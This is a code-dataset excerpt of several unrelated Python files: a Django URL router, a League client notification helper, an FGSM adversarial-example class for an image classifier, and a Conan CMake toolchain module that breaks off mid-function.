views.OrderViewSet)\nrouter.register(r'trade', views.TradeViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('token-auth/', obtain_jwt_token)\n]\n","repo_name":"aleclara95/test-exchange-be","sub_path":"apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24452930605","text":"''' Module for notifications related tasks '''\nimport asyncio\n\nfrom connection.league import LeagueConnection\n\n\nasync def delete_lb_notification(connection: LeagueConnection):\n ''' Deletes leaverbuster notification '''\n future = connection.async_delete('/lol-leaver-buster/v1/notifications/1')\n await asyncio.sleep(0)\n future.result()\n\n\nasync def post_honor_ack(connection: LeagueConnection):\n ''' Posts honor ack '''\n future = connection.async_post('/lol-honor-v2/v1/level-change/ack')\n await asyncio.sleep(0)\n future.result()\n","repo_name":"pradishb/auto-disenchanter","sub_path":"client/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"73490685370","text":"import os\nproject_index = os.getcwd().find('AdversialExamples')\nroot = os.getcwd()[0:project_index] + 'AdversialExamples'\nimport sys\nsys.path.append(root)\nimport torch\nimport torch.nn.functional as F\nfrom model.CNNModel import CNN_model\nfrom tartgetdata.GetData import dataloaders\nfrom utils.vis import batch_show\n\n\n\n\nclass Attack(object):\n def __init__(self, target_net, attack_type='FGSM', criterion_func=F.cross_entropy):\n \"\"\"\n 攻击目标网络生成样本\n :param target_net: 攻击的目标网络,需要有attribute name\n :param attack_type:\n :param criterion_func:\n \"\"\"\n self.target_net = target_net\n self.attack_type = attack_type\n self.creterion_func = criterion_func\n\n def fgsm_attack(self, x, hx, ifdodge=False, epsilon=0.5, x_min=-1, x_max=1):\n assert self.target_net.name == 'resnet18', ValueError(\"This model isn't supported yet!\")\n x = x.clone().detach().requires_grad_(True)\n output = self.target_net(x)\n loss = -self.creterion_func(output, hx) if ifdodge else self.creterion_func(output, hx)\n self.target_net.zero_grad()\n loss.backward()\n pertubation = epsilon * x.grad.sign_()\n return torch.clamp(x + pertubation, x_min, x_max)\n\n def ifgsm_attack(self, x, hx, ifdodge=False, epsilon=0.5, ):\n pass\n\n\n\n\nif __name__ == '__main__':\n at = Attack(CNN_model)\n inp, label = next(iter(dataloaders['train']))\n res = at.attack(inp, label)\n batch_show(res.detach(), label)\n","repo_name":"JerryMazeyu/AdversialExamples","sub_path":"model/Attack.py","file_name":"Attack.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31841483665","text":"import os\nimport re\nimport textwrap\nfrom collections import OrderedDict\n\nfrom jinja2 import Template\n\nfrom conan.tools.apple.apple import get_apple_sdk_fullname\nfrom conan.tools.android.utils import android_abi\nfrom conan.tools.apple.apple import is_apple_os, to_apple_arch\nfrom conan.tools.build import build_jobs\nfrom conan.tools.build.flags import architecture_flag, libcxx_flags\nfrom conan.tools.build.cross_building import cross_building\nfrom conan.tools.cmake.toolchain import CONAN_TOOLCHAIN_FILENAME\nfrom conan.tools.intel import IntelCC\nfrom conan.tools.microsoft.visual import msvc_version_to_toolset_version\nfrom conans.client.subsystems import deduce_subsystem, WINDOWS\nfrom conan.errors import ConanException\nfrom conans.util.files import load\n\n\nclass Block(object):\n def __init__(self, conanfile, toolchain):\n self._conanfile = conanfile\n self._toolchain = toolchain\n self._context_values = None\n\n @property\n def values(self):\n if self._context_values is None:\n self._context_values = self.context()\n return self._context_values\n\n @values.setter\n def values(self, context_values):\n self._context_values = context_values\n\n def get_rendered_content(self):\n context = self.values\n if context is None:\n return\n\n def cmake_value(value):\n if isinstance(value, bool):\n return \"ON\" if value else \"OFF\"\n else:\n return '\"{}\"'.format(value)\n\n template = Template(self.template, trim_blocks=True, lstrip_blocks=True)\n template.environment.filters[\"cmake_value\"] = cmake_value\n return template.render(**context)\n\n def context(self):\n return {}\n\n @property\n def template(self):\n raise NotImplementedError()\n\n\nclass VSRuntimeBlock(Block):\n template = textwrap.dedent(\"\"\"\n # Definition of VS runtime, defined from build_type, compiler.runtime, compiler.runtime_type\n {% set genexpr = namespace(str='') %}\n {% for config, value in vs_runtimes.items() %}\n {% set genexpr.str = genexpr.str +\n '$<$:' + value|string + '>' %}\n {% endfor %}\n cmake_policy(GET CMP0091 POLICY_CMP0091)\n if(NOT \"${POLICY_CMP0091}\" STREQUAL NEW)\n message(FATAL_ERROR \"The CMake policy CMP0091 must be NEW, but is '${POLICY_CMP0091}'\")\n endif()\n set(CMAKE_MSVC_RUNTIME_LIBRARY \"{{ genexpr.str }}\")\n \"\"\")\n\n def context(self):\n # Parsing existing toolchain file to get existing configured runtimes\n settings = self._conanfile.settings\n if settings.get_safe(\"os\") != \"Windows\":\n return\n\n compiler = settings.get_safe(\"compiler\")\n if compiler not in (\"msvc\", \"clang\", \"intel-cc\"):\n return\n\n runtime = settings.get_safe(\"compiler.runtime\")\n if runtime is None:\n return\n\n config_dict = {}\n if os.path.exists(CONAN_TOOLCHAIN_FILENAME):\n existing_include = load(CONAN_TOOLCHAIN_FILENAME)\n msvc_runtime_value = re.search(r\"set\\(CMAKE_MSVC_RUNTIME_LIBRARY \\\"([^)]*)\\\"\\)\",\n existing_include)\n if msvc_runtime_value:\n capture = msvc_runtime_value.group(1)\n matches = re.findall(r\"\\$<\\$:([A-Za-z]*)>\", capture)\n config_dict = dict(matches)\n\n build_type = settings.get_safe(\"build_type\") # FIXME: change for configuration\n if build_type is None:\n return None\n\n if compiler == \"msvc\" or compiler == \"intel-cc\" or compiler == \"clang\":\n runtime_type = settings.get_safe(\"compiler.runtime_type\")\n rt = \"MultiThreadedDebug\" if runtime_type == \"Debug\" else \"MultiThreaded\"\n if runtime != \"static\":\n rt += \"DLL\"\n config_dict[build_type] = rt\n\n # If clang is being used the CMake check of compiler will try to create a simple\n # test application, and will fail because the Debug runtime is not there\n if compiler == \"clang\":\n if config_dict.get(\"Debug\") is None:\n clang_rt = \"MultiThreadedDebug\" + (\"DLL\" if runtime != \"static\" else \"\")\n config_dict[\"Debug\"] = clang_rt\n\n return {\"vs_runtimes\": config_dict}\n\n\nclass FPicBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if fpic %}\n message(STATUS \"Conan toolchain: Setting CMAKE_POSITION_INDEPENDENT_CODE={{ fpic }} (options.fPIC)\")\n set(CMAKE_POSITION_INDEPENDENT_CODE {{ fpic }} CACHE BOOL \"Position independent code\")\n {% endif %}\n \"\"\")\n\n def context(self):\n fpic = self._conanfile.options.get_safe(\"fPIC\")\n if fpic is None:\n return None\n os_ = self._conanfile.settings.get_safe(\"os\")\n if os_ and \"Windows\" in os_:\n self._conanfile.output.warning(\"Toolchain: Ignoring fPIC option defined for Windows\")\n return None\n return {\"fpic\": \"ON\" if fpic else \"OFF\"}\n\n\nclass GLibCXXBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if set_libcxx %}\n string(APPEND CONAN_CXX_FLAGS \" {{ set_libcxx }}\")\n {% endif %}\n {% if glibcxx %}\n add_compile_definitions({{ glibcxx }})\n {% endif %}\n \"\"\")\n\n def context(self):\n libcxx, stdlib11 = libcxx_flags(self._conanfile)\n return {\"set_libcxx\": libcxx, \"glibcxx\": stdlib11}\n\n\nclass SkipRPath(Block):\n template = textwrap.dedent(\"\"\"\n {% if skip_rpath %}\n set(CMAKE_SKIP_RPATH 1 CACHE BOOL \"rpaths\" FORCE)\n # Policy CMP0068\n # We want the old behavior, in CMake >= 3.9 CMAKE_SKIP_RPATH won't affect install_name in OSX\n set(CMAKE_INSTALL_NAME_DIR \"\")\n {% endif %}\n \"\"\")\n\n skip_rpath = False\n\n def context(self):\n return {\"skip_rpath\": self.skip_rpath}\n\n\nclass ArchitectureBlock(Block):\n template = textwrap.dedent(\"\"\"\n string(APPEND CONAN_CXX_FLAGS \" {{ arch_flag }}\")\n string(APPEND CONAN_C_FLAGS \" {{ arch_flag }}\")\n string(APPEND CONAN_SHARED_LINKER_FLAGS \" {{ arch_flag }}\")\n string(APPEND CONAN_EXE_LINKER_FLAGS \" {{ arch_flag }}\")\n \"\"\")\n\n def context(self):\n arch_flag = architecture_flag(self._conanfile.settings)\n if not arch_flag:\n return\n return {\"arch_flag\": arch_flag}\n\n\nclass LinkerScriptsBlock(Block):\n template = textwrap.dedent(\"\"\"\n string(APPEND CONAN_EXE_LINKER_FLAGS {{ linker_script_flags }})\n \"\"\")\n\n def context(self):\n linker_scripts = self._conanfile.conf.get(\n \"tools.build:linker_scripts\", check_type=list, default=[])\n if not linker_scripts:\n return\n linker_scripts = [linker_script.replace('\\\\', '/') for linker_script in linker_scripts]\n linker_script_flags = ['-T\"' + linker_script + '\"' for linker_script in linker_scripts]\n return {\"linker_script_flags\": \" \".join(linker_script_flags)}\n\n\nclass CppStdBlock(Block):\n template = textwrap.dedent(\"\"\"\n message(STATUS \"Conan toolchain: C++ Standard {{ cppstd }} with extensions {{ cppstd_extensions }}\")\n set(CMAKE_CXX_STANDARD {{ cppstd }})\n set(CMAKE_CXX_EXTENSIONS {{ cppstd_extensions }})\n set(CMAKE_CXX_STANDARD_REQUIRED ON)\n \"\"\")\n\n def context(self):\n compiler_cppstd = self._conanfile.settings.get_safe(\"compiler.cppstd\")\n if compiler_cppstd is None:\n return None\n\n if compiler_cppstd.startswith(\"gnu\"):\n cppstd = compiler_cppstd[3:]\n cppstd_extensions = \"ON\"\n else:\n cppstd = compiler_cppstd\n cppstd_extensions = \"OFF\"\n return {\"cppstd\": cppstd, \"cppstd_extensions\": cppstd_extensions}\n\n\nclass SharedLibBock(Block):\n template = textwrap.dedent(\"\"\"\n message(STATUS \"Conan toolchain: Setting BUILD_SHARED_LIBS = {{ shared_libs }}\")\n set(BUILD_SHARED_LIBS {{ shared_libs }} CACHE BOOL \"Build shared libraries\")\n \"\"\")\n\n def context(self):\n try:\n shared_libs = \"ON\" if self._conanfile.options.shared else \"OFF\"\n return {\"shared_libs\": shared_libs}\n except ConanException:\n return None\n\n\nclass ParallelBlock(Block):\n template = textwrap.dedent(\"\"\"\n string(APPEND CONAN_CXX_FLAGS \" /MP{{ parallel }}\")\n string(APPEND CONAN_C_FLAGS \" /MP{{ parallel }}\")\n \"\"\")\n\n def context(self):\n # TODO: Check this conf\n\n compiler = self._conanfile.settings.get_safe(\"compiler\")\n if compiler != \"msvc\" or \"Visual\" not in self._toolchain.generator:\n return\n\n jobs = build_jobs(self._conanfile)\n if jobs:\n return {\"parallel\": jobs}\n\n\nclass AndroidSystemBlock(Block):\n\n template = textwrap.dedent(\"\"\"\n # New toolchain things\n set(ANDROID_PLATFORM {{ android_platform }})\n {% if android_stl %}\n set(ANDROID_STL {{ android_stl }})\n {% endif %}\n set(ANDROID_ABI {{ android_abi }})\n {% if android_use_legacy_toolchain_file %}\n set(ANDROID_USE_LEGACY_TOOLCHAIN_FILE {{ android_use_legacy_toolchain_file }})\n {% endif %}\n include({{ android_ndk_path }}/build/cmake/android.toolchain.cmake)\n \"\"\")\n\n def context(self):\n os_ = self._conanfile.settings.get_safe(\"os\")\n if os_ != \"Android\":\n return\n\n # TODO: only 'c++_shared' y 'c++_static' supported?\n # https://developer.android.com/ndk/guides/cpp-support\n libcxx_str = self._conanfile.settings.get_safe(\"compiler.libcxx\")\n\n android_ndk_path = self._conanfile.conf.get(\"tools.android:ndk_path\")\n if not android_ndk_path:\n raise ConanException('CMakeToolchain needs tools.android:ndk_path configuration defined')\n android_ndk_path = android_ndk_path.replace(\"\\\\\", \"/\")\n\n use_cmake_legacy_toolchain = self._conanfile.conf.get(\"tools.android:cmake_legacy_toolchain\",\n check_type=bool)\n if use_cmake_legacy_toolchain is not None:\n use_cmake_legacy_toolchain = \"ON\" if use_cmake_legacy_toolchain else \"OFF\"\n\n ctxt_toolchain = {\n 'android_platform': 'android-' + str(self._conanfile.settings.os.api_level),\n 'android_abi': android_abi(self._conanfile),\n 'android_stl': libcxx_str,\n 'android_ndk_path': android_ndk_path,\n 'android_use_legacy_toolchain_file': use_cmake_legacy_toolchain,\n }\n return ctxt_toolchain\n\n\nclass AppleSystemBlock(Block):\n template = textwrap.dedent(\"\"\"\n # Set the architectures for which to build.\n set(CMAKE_OSX_ARCHITECTURES {{ cmake_osx_architectures }} CACHE STRING \"\" FORCE)\n # Setting CMAKE_OSX_SYSROOT SDK, when using Xcode generator the name is enough\n # but full path is necessary for others\n set(CMAKE_OSX_SYSROOT {{ cmake_osx_sysroot }} CACHE STRING \"\" FORCE)\n {% if cmake_osx_deployment_target is defined %}\n # Setting CMAKE_OSX_DEPLOYMENT_TARGET if \"os.version\" is defined by the used conan profile\n set(CMAKE_OSX_DEPLOYMENT_TARGET \"{{ cmake_osx_deployment_target }}\" CACHE STRING \"\")\n {% endif %}\n set(BITCODE \"\")\n set(FOBJC_ARC \"\")\n set(VISIBILITY \"\")\n {% if enable_bitcode %}\n # Bitcode ON\n set(CMAKE_XCODE_ATTRIBUTE_ENABLE_BITCODE \"YES\")\n set(CMAKE_XCODE_ATTRIBUTE_BITCODE_GENERATION_MODE \"bitcode\")\n {% if enable_bitcode_marker %}\n set(BITCODE \"-fembed-bitcode-marker\")\n {% else %}\n set(BITCODE \"-fembed-bitcode\")\n {% endif %}\n {% elif enable_bitcode is not none %}\n # Bitcode OFF\n set(CMAKE_XCODE_ATTRIBUTE_ENABLE_BITCODE \"NO\")\n {% endif %}\n {% if enable_arc %}\n # ARC ON\n set(FOBJC_ARC \"-fobjc-arc\")\n set(CMAKE_XCODE_ATTRIBUTE_CLANG_ENABLE_OBJC_ARC \"YES\")\n {% elif enable_arc is not none %}\n # ARC OFF\n set(FOBJC_ARC \"-fno-objc-arc\")\n set(CMAKE_XCODE_ATTRIBUTE_CLANG_ENABLE_OBJC_ARC \"NO\")\n {% endif %}\n {% if enable_visibility %}\n # Visibility ON\n set(CMAKE_XCODE_ATTRIBUTE_GCC_SYMBOLS_PRIVATE_EXTERN \"NO\")\n set(VISIBILITY \"-fvisibility=default\")\n {% elif enable_visibility is not none %}\n # Visibility OFF\n set(VISIBILITY \"-fvisibility=hidden -fvisibility-inlines-hidden\")\n set(CMAKE_XCODE_ATTRIBUTE_GCC_SYMBOLS_PRIVATE_EXTERN \"YES\")\n {% endif %}\n #Check if Xcode generator is used, since that will handle these flags automagically\n if(CMAKE_GENERATOR MATCHES \"Xcode\")\n message(DEBUG \"Not setting any manual command-line buildflags, since Xcode is selected as generator.\")\n else()\n string(APPEND CONAN_C_FLAGS \" ${BITCODE} ${FOBJC_ARC}\")\n string(APPEND CONAN_CXX_FLAGS \" ${BITCODE} ${VISIBILITY} ${FOBJC_ARC}\")\n endif()\n \"\"\")\n\n def context(self):\n if not is_apple_os(self._conanfile):\n return None\n\n # check valid combinations of architecture - os ?\n # for iOS a FAT library valid for simulator and device can be generated\n # if multiple archs are specified \"-DCMAKE_OSX_ARCHITECTURES=armv7;armv7s;arm64;i386;x86_64\"\n host_architecture = to_apple_arch(self._conanfile)\n\n host_os_version = self._conanfile.settings.get_safe(\"os.version\")\n host_sdk_name = self._conanfile.conf.get(\"tools.apple:sdk_path\") or get_apple_sdk_fullname(self._conanfile)\n is_debug = self._conanfile.settings.get_safe('build_type') == \"Debug\"\n\n # Reading some configurations to enable or disable some Xcode toolchain flags and variables\n # Issue related: https://github.com/conan-io/conan/issues/9448\n # Based on https://github.com/leetal/ios-cmake repository\n enable_bitcode = self._conanfile.conf.get(\"tools.apple:enable_bitcode\", check_type=bool)\n enable_arc = self._conanfile.conf.get(\"tools.apple:enable_arc\", check_type=bool)\n enable_visibility = self._conanfile.conf.get(\"tools.apple:enable_visibility\", check_type=bool)\n\n ctxt_toolchain = {\n \"enable_bitcode\": enable_bitcode,\n \"enable_bitcode_marker\": all([enable_bitcode, is_debug]),\n \"enable_arc\": enable_arc,\n \"enable_visibility\": enable_visibility\n }\n if host_sdk_name:\n ctxt_toolchain[\"cmake_osx_sysroot\"] = host_sdk_name\n # this is used to initialize the OSX_ARCHITECTURES property on each target as it is created\n if host_architecture:\n ctxt_toolchain[\"cmake_osx_architectures\"] = host_architecture\n\n if host_os_version:\n # https://cmake.org/cmake/help/latest/variable/CMAKE_OSX_DEPLOYMENT_TARGET.html\n # Despite the OSX part in the variable name(s) they apply also to other SDKs than\n # macOS like iOS, tvOS, watchOS or visionOS.\n ctxt_toolchain[\"cmake_osx_deployment_target\"] = host_os_version\n\n return ctxt_toolchain\n\n\nclass FindFiles(Block):\n template = textwrap.dedent(\"\"\"\n {% if find_package_prefer_config %}\n set(CMAKE_FIND_PACKAGE_PREFER_CONFIG {{ find_package_prefer_config }})\n {% endif %}\n\n # Definition of CMAKE_MODULE_PATH\n {% if build_paths %}\n list(PREPEND CMAKE_MODULE_PATH {{ build_paths }})\n {% endif %}\n {% if generators_folder %}\n # the generators folder (where conan generates files, like this toolchain)\n list(PREPEND CMAKE_MODULE_PATH {{ generators_folder }})\n {% endif %}\n\n # Definition of CMAKE_PREFIX_PATH, CMAKE_XXXXX_PATH\n {% if build_paths %}\n # The explicitly defined \"builddirs\" of \"host\" context dependencies must be in PREFIX_PATH\n list(PREPEND CMAKE_PREFIX_PATH {{ build_paths }})\n {% endif %}\n {% if generators_folder %}\n # The Conan local \"generators\" folder, where this toolchain is saved.\n list(PREPEND CMAKE_PREFIX_PATH {{ generators_folder }} )\n {% endif %}\n {% if cmake_program_path %}\n list(PREPEND CMAKE_PROGRAM_PATH {{ cmake_program_path }})\n {% endif %}\n {% if cmake_library_path %}\n list(PREPEND CMAKE_LIBRARY_PATH {{ cmake_library_path }})\n {% endif %}\n {% if is_apple and cmake_framework_path %}\n list(PREPEND CMAKE_FRAMEWORK_PATH {{ cmake_framework_path }})\n {% endif %}\n {% if cmake_include_path %}\n list(PREPEND CMAKE_INCLUDE_PATH {{ cmake_include_path }})\n {% endif %}\n\n {% if cross_building %}\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_PACKAGE OR CMAKE_FIND_ROOT_PATH_MODE_PACKAGE STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_PACKAGE \"BOTH\")\n endif()\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_PROGRAM OR CMAKE_FIND_ROOT_PATH_MODE_PROGRAM STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_PROGRAM \"BOTH\")\n endif()\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_LIBRARY OR CMAKE_FIND_ROOT_PATH_MODE_LIBRARY STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_LIBRARY \"BOTH\")\n endif()\n {% if is_apple %}\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_FRAMEWORK OR CMAKE_FIND_ROOT_PATH_MODE_FRAMEWORK STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_FRAMEWORK \"BOTH\")\n endif()\n {% endif %}\n if(NOT DEFINED CMAKE_FIND_ROOT_PATH_MODE_INCLUDE OR CMAKE_FIND_ROOT_PATH_MODE_INCLUDE STREQUAL \"ONLY\")\n set(CMAKE_FIND_ROOT_PATH_MODE_INCLUDE \"BOTH\")\n endif()\n {% endif %}\n \"\"\")\n\n @staticmethod\n def _join_paths(paths):\n return \" \".join(['\"{}\"'.format(p.replace('\\\\', '/')\n .replace('$', '\\\\$')\n .replace('\"', '\\\\\"')) for p in paths])\n\n def context(self):\n # To find the generated cmake_find_package finders\n # TODO: Change this for parameterized output location of CMakeDeps\n find_package_prefer_config = \"ON\" # assume ON by default if not specified in conf\n prefer_config = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:find_package_prefer_config\",\n check_type=bool)\n if prefer_config is False:\n find_package_prefer_config = \"OFF\"\n\n is_apple_ = is_apple_os(self._conanfile)\n\n # Read information from host context\n # TODO: Add here in 2.0 the \"skip\": False trait\n host_req = self._conanfile.dependencies.filter({\"build\": False}).values()\n build_paths = []\n host_lib_paths = []\n host_framework_paths = []\n host_include_paths = []\n for req in host_req:\n cppinfo = req.cpp_info.aggregated_components()\n build_paths.extend(cppinfo.builddirs)\n host_lib_paths.extend(cppinfo.libdirs)\n if is_apple_:\n host_framework_paths.extend(cppinfo.frameworkdirs)\n host_include_paths.extend(cppinfo.includedirs)\n\n # Read information from build context\n build_req = self._conanfile.dependencies.build.values()\n build_bin_paths = []\n for req in build_req:\n cppinfo = req.cpp_info.aggregated_components()\n build_paths.extend(cppinfo.builddirs)\n build_bin_paths.extend(cppinfo.bindirs)\n\n return {\n \"find_package_prefer_config\": find_package_prefer_config,\n \"generators_folder\": \"${CMAKE_CURRENT_LIST_DIR}\",\n \"build_paths\": self._join_paths(build_paths),\n \"cmake_program_path\": self._join_paths(build_bin_paths),\n \"cmake_library_path\": self._join_paths(host_lib_paths),\n \"cmake_framework_path\": self._join_paths(host_framework_paths),\n \"cmake_include_path\": self._join_paths(host_include_paths),\n \"is_apple\": is_apple_,\n \"cross_building\": cross_building(self._conanfile),\n }\n\n\nclass PkgConfigBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if pkg_config %}\n set(PKG_CONFIG_EXECUTABLE {{ pkg_config }} CACHE FILEPATH \"pkg-config executable\")\n {% endif %}\n {% if pkg_config_path %}\n if (DEFINED ENV{PKG_CONFIG_PATH})\n set(ENV{PKG_CONFIG_PATH} \"{{ pkg_config_path }}$ENV{PKG_CONFIG_PATH}\")\n else()\n set(ENV{PKG_CONFIG_PATH} \"{{ pkg_config_path }}\")\n endif()\n {% endif %}\n \"\"\")\n\n def context(self):\n pkg_config = self._conanfile.conf.get(\"tools.gnu:pkg_config\", check_type=str)\n if pkg_config:\n pkg_config = pkg_config.replace(\"\\\\\", \"/\")\n subsystem = deduce_subsystem(self._conanfile, \"build\")\n pathsep = \":\" if subsystem != WINDOWS else \";\"\n pkg_config_path = \"${CMAKE_CURRENT_LIST_DIR}\" + pathsep\n return {\"pkg_config\": pkg_config,\n \"pkg_config_path\": pkg_config_path}\n\n\nclass UserToolchain(Block):\n template = textwrap.dedent(\"\"\"\n {% for user_toolchain in paths %}\n include(\"{{user_toolchain}}\")\n {% endfor %}\n \"\"\")\n\n def context(self):\n # This is global [conf] injection of extra toolchain files\n user_toolchain = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:user_toolchain\",\n default=[], check_type=list)\n return {\"paths\": [ut.replace(\"\\\\\", \"/\") for ut in user_toolchain]}\n\n\nclass ExtraFlagsBlock(Block):\n \"\"\"This block is adding flags directly from user [conf] section\"\"\"\n\n template = textwrap.dedent(\"\"\"\n # Extra c, cxx, linkflags and defines\n {% if cxxflags %}\n string(APPEND CONAN_CXX_FLAGS \"{% for cxxflag in cxxflags %} {{ cxxflag }}{% endfor %}\")\n {% endif %}\n {% if cflags %}\n string(APPEND CONAN_C_FLAGS \"{% for cflag in cflags %} {{ cflag }}{% endfor %}\")\n {% endif %}\n {% if sharedlinkflags %}\n string(APPEND CONAN_SHARED_LINKER_FLAGS \"{% for sharedlinkflag in sharedlinkflags %} {{ sharedlinkflag }}{% endfor %}\")\n {% endif %}\n {% if exelinkflags %}\n string(APPEND CONAN_EXE_LINKER_FLAGS \"{% for exelinkflag in exelinkflags %} {{ exelinkflag }}{% endfor %}\")\n {% endif %}\n {% if defines %}\n add_compile_definitions({% for define in defines %} \"{{ define }}\"{% endfor %})\n {% endif %}\n \"\"\")\n\n def context(self):\n # Now, it's time to get all the flags defined by the user\n cxxflags = self._toolchain.extra_cxxflags + self._conanfile.conf.get(\"tools.build:cxxflags\", default=[], check_type=list)\n cflags = self._toolchain.extra_cflags + self._conanfile.conf.get(\"tools.build:cflags\", default=[], check_type=list)\n sharedlinkflags = self._toolchain.extra_sharedlinkflags + self._conanfile.conf.get(\"tools.build:sharedlinkflags\", default=[], check_type=list)\n exelinkflags = self._toolchain.extra_exelinkflags + self._conanfile.conf.get(\"tools.build:exelinkflags\", default=[], check_type=list)\n defines = self._conanfile.conf.get(\"tools.build:defines\", default=[], check_type=list)\n\n # See https://github.com/conan-io/conan/issues/13374\n android_ndk_path = self._conanfile.conf.get(\"tools.android:ndk_path\")\n android_legacy_toolchain = self._conanfile.conf.get(\"tools.android:cmake_legacy_toolchain\",\n check_type=bool)\n if android_ndk_path and (cxxflags or cflags) and android_legacy_toolchain is not False:\n self._conanfile.output.warning(\"tools.build:cxxflags or cflags are defined, but Android NDK toolchain may be overriding \"\n \"the values. Consider setting tools.android:cmake_legacy_toolchain to False.\")\n\n return {\n \"cxxflags\": cxxflags,\n \"cflags\": cflags,\n \"sharedlinkflags\": sharedlinkflags,\n \"exelinkflags\": exelinkflags,\n \"defines\": [define.replace('\"', '\\\\\"') for define in defines]\n }\n\n\nclass CMakeFlagsInitBlock(Block):\n template = textwrap.dedent(\"\"\"\n if(DEFINED CONAN_CXX_FLAGS)\n string(APPEND CMAKE_CXX_FLAGS_INIT \" ${CONAN_CXX_FLAGS}\")\n endif()\n if(DEFINED CONAN_C_FLAGS)\n string(APPEND CMAKE_C_FLAGS_INIT \" ${CONAN_C_FLAGS}\")\n endif()\n if(DEFINED CONAN_SHARED_LINKER_FLAGS)\n string(APPEND CMAKE_SHARED_LINKER_FLAGS_INIT \" ${CONAN_SHARED_LINKER_FLAGS}\")\n endif()\n if(DEFINED CONAN_EXE_LINKER_FLAGS)\n string(APPEND CMAKE_EXE_LINKER_FLAGS_INIT \" ${CONAN_EXE_LINKER_FLAGS}\")\n endif()\n \"\"\")\n\n\nclass TryCompileBlock(Block):\n template = textwrap.dedent(\"\"\"\n get_property( _CMAKE_IN_TRY_COMPILE GLOBAL PROPERTY IN_TRY_COMPILE )\n if(_CMAKE_IN_TRY_COMPILE)\n message(STATUS \"Running toolchain IN_TRY_COMPILE\")\n return()\n endif()\n \"\"\")\n\n\nclass CompilersBlock(Block):\n template = textwrap.dedent(r\"\"\"\n {% for lang, compiler_path in compilers.items() %}\n set(CMAKE_{{ lang }}_COMPILER \"{{ compiler_path|replace('\\\\', '/') }}\")\n {% endfor %}\n \"\"\")\n\n def context(self):\n # Reading configuration from \"tools.build:compiler_executables\" -> {\"C\": \"/usr/bin/gcc\"}\n compilers_by_conf = self._conanfile.conf.get(\"tools.build:compiler_executables\", default={},\n check_type=dict)\n # Map the possible languages\n compilers = {}\n # Allowed variables (and _LAUNCHER)\n compilers_mapping = {\"c\": \"C\", \"cuda\": \"CUDA\", \"cpp\": \"CXX\", \"objc\": \"OBJC\",\n \"objcpp\": \"OBJCXX\", \"rc\": \"RC\", 'fortran': \"Fortran\", 'asm': \"ASM\",\n \"hip\": \"HIP\", \"ispc\": \"ISPC\"}\n for comp, lang in compilers_mapping.items():\n # To set CMAKE__COMPILER\n if comp in compilers_by_conf:\n compilers[lang] = compilers_by_conf[comp]\n return {\"compilers\": compilers}\n\n\nclass GenericSystemBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if cmake_sysroot %}\n set(CMAKE_SYSROOT {{ cmake_sysroot }})\n {% endif %}\n\n {% if cmake_system_name %}\n # Cross building\n set(CMAKE_SYSTEM_NAME {{ cmake_system_name }})\n {% endif %}\n {% if cmake_system_version %}\n set(CMAKE_SYSTEM_VERSION {{ cmake_system_version }})\n {% endif %}\n {% if cmake_system_processor %}\n set(CMAKE_SYSTEM_PROCESSOR {{ cmake_system_processor }})\n {% endif %}\n\n {% if generator_platform %}\n set(CMAKE_GENERATOR_PLATFORM \"{{ generator_platform }}\" CACHE STRING \"\" FORCE)\n {% endif %}\n {% if toolset %}\n set(CMAKE_GENERATOR_TOOLSET \"{{ toolset }}\" CACHE STRING \"\" FORCE)\n {% endif %}\n \"\"\")\n\n def _get_toolset(self, generator):\n toolset = None\n if generator is None or (\"Visual\" not in generator and \"Xcode\" not in generator):\n return None\n settings = self._conanfile.settings\n compiler = settings.get_safe(\"compiler\")\n if compiler == \"intel-cc\":\n return IntelCC(self._conanfile).ms_toolset\n elif compiler == \"msvc\":\n toolset = settings.get_safe(\"compiler.toolset\")\n if toolset is None:\n compiler_version = str(settings.compiler.version)\n compiler_update = str(settings.compiler.update)\n if compiler_update != \"None\": # It is full one(19.28), not generic 19.2X\n # The equivalent of compiler 19.26 is toolset 14.26\n toolset = \"version=14.{}{}\".format(compiler_version[-1], compiler_update)\n else:\n toolset = msvc_version_to_toolset_version(compiler_version)\n elif compiler == \"clang\":\n if generator and \"Visual\" in generator:\n if \"Visual Studio 16\" in generator or \"Visual Studio 17\" in generator:\n toolset = \"ClangCL\"\n else:\n raise ConanException(\"CMakeToolchain with compiler=clang and a CMake \"\n \"'Visual Studio' generator requires VS16 or VS17\")\n toolset_arch = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:toolset_arch\")\n if toolset_arch is not None:\n toolset_arch = \"host={}\".format(toolset_arch)\n toolset = toolset_arch if toolset is None else \"{},{}\".format(toolset, toolset_arch)\n return toolset\n\n def _get_generator_platform(self, generator):\n settings = self._conanfile.settings\n # Returns the generator platform to be used by CMake\n compiler = settings.get_safe(\"compiler\")\n arch = settings.get_safe(\"arch\")\n\n if settings.get_safe(\"os\") == \"WindowsCE\":\n return settings.get_safe(\"os.platform\")\n\n if compiler in (\"msvc\", \"clang\") and generator and \"Visual\" in generator:\n return {\"x86\": \"Win32\",\n \"x86_64\": \"x64\",\n \"armv7\": \"ARM\",\n \"armv8\": \"ARM64\",\n \"arm64ec\": \"ARM64EC\"}.get(arch)\n return None\n\n def _get_generic_system_name(self):\n os_host = 